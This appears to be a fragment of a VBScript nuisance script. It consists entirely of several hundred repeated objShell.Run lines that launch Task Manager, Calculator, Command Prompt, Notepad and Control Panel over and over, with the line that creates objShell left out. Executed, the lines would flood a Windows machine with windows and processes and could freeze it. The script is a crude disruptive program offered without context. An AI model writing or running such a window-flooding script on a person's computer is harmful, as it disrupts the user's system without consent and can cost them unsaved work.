objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

